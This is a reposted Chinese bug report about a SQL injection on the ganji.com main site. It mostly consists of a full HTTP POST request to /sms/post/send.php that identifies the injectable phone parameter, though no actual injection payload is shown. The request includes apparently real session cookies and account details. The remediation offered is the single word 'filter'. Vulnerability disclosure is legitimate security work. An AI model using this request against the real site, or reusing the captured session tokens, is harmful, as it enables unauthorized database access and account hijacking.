欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

赶集网主站SQL注入

程序员文章站 2022-07-03 08:23:19
友情检测赶集网,发现SQL注入一枚 注入点位于:POST /sms/post/send.php?ad-ref=sms&content=&unique_id=house_pre...

友情检测赶集网,发现SQL注入一枚

注入点位于:POST /sms/post/send.php?ad-ref=sms&content=&unique_id=house_premier_puid_2105604786&domain=bj提交以下post内容可现:POST /sms/post/send.php?ad-ref=sms&content=&unique_id=house_premier_puid_2105604786&domain=bj HTTP/1.1Host: www.ganji.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cnAccept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedOrigin: https://www.ganji.comContent-Length: 36Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17Referer: https://www.ganji.com/sms/post/send.php?ad-ref=sms&content=&unique_id=house_premier_puid_2105604786&domain=bjCookie: GANJISESSID=46c52b9dcc974165c0e33519bbfa523c; GDNETSSOC=userm=VyTZ2dihqf/lFqYOnuG+LsFj5g8EM/BDydXx+OJyjr9D8l68blL03Zws8S7d8e78fXVEBrZ+ODFFEaSUvHlu1w==; GanjiUserInfo=%7B%22user_id%22%3A679736482%2C%22email%22%3A%22%22%2C%22username%22%3A%22crazykb%22%2C%22user_name%22%3A%22crazykb%22%2C%22nickname%22%3A%22%22%7D; GanjiUserName=crazykb; NTKF_T2D_CLIENTID=guest9EEBBB3F-823F-0FF9-FF32-6952CA0D067D; STA_DS=1; __utma=32156897.1389085893.1462858572.1463041380.1463389095.7; __utmb=32156897.16.10.1463389095; __utmc=32156897; __utmganji_v20110909=0x96ed933a06e976ba3abd755d9fd4a1a; __utmt=1; __utmz=32156897.1462890272.4.4.utmcsr=hrvip.ganji.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _gl_tracker=%7B%22ca_source%22%3A%22-%22%2C%22ca_name%22%3A%22-%22%2C%22ca_kw%22%3A%22-%22%2C%22ca_id%22%3A%22-%22%2C%22ca_s%22%3A%22self%22%2C%22ca_n%22%3A%22-%22%2C%22ca_i%22%3A%22-%22%2C%22sid%22%3A51338894992%2C%22kw%22%3A%22%E5%80%A1%E4%B9%90%E7%94%B5%E5%AD%90%22%7D; bizs=%5B%5D; cityDomain=bj; citydomain=bj; ganji_uuid=6097496099331051159669-512701341; ganji_xuuid=4dc75f09-1766-4188-af6f-729069c8effa.1462858577365; gj_inner_acc=1-110465; iframe_resume_time=2; last_name=crazykb; mobversionbeta=2.0; nTalk_CACHE_DATA={uid:kf_10111_ISME9754_679736482}; sscode=90NyPnFU1Fj2R2aM90AkgQ%2BX; supercookie=Awp5AmZ2AQtlWTMvLmLlAQtkAJD1BTD1LJR2BGIzZQDlMJEzLzWvZmNmAJIvMGIvLGZ%3D; vip_version=newphone=XXXXXX&code=&countTime=-1其中XXXXXX为个人手机号码。

 

赶集网主站SQL注入

 

修复方案:

过滤